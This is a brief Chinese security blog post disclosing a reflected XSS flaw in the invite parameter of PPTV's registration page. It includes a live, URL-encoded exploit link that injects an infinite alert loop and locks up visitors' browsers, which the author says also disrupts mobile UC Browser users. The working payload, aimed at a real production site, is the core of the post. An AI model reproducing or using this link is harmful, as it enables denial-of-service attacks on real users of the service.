黑狼's blog | 关注网络安全

还是PPTV，今天就来挑挑它的刺，pptv邀请好注册处因url参数过滤不严存在反射型xss，导致xss dos，如图：

浏览器稍微低点的客户就会受到攻击，只有任务管理器关掉浏览器才能结束。

如果是手机用户的话，百分百会中招！使用uc浏览器访问的话，导致xss dos，无法结束，重启也没用，本人亲测过。。。

如图：

不过本人后来还是找到了解决方法，如果哪位小朋友好奇尝试了无法关闭的话，可以联系我，在我的博客下方留言

链接忘了写了，补上：https://passport.pptv.com/register.do?invite=%22%3E%3C%73%63%72%69%70%74%3E%66%6F%72%28%3B%3B%29%7B%61%6C%65%72%74%28%27%77%77%77%2E%68%6C%68%61%63%6B%65%72%2E%63%6F%6D%27%29%7D%3C%2F%73%63%72%69%70%74%3E%3C%22&index=05

不要轻易尝试，后果自负。。。

PS：转载时请注意出处，本人原创，切勿盗版，盗版必究！！！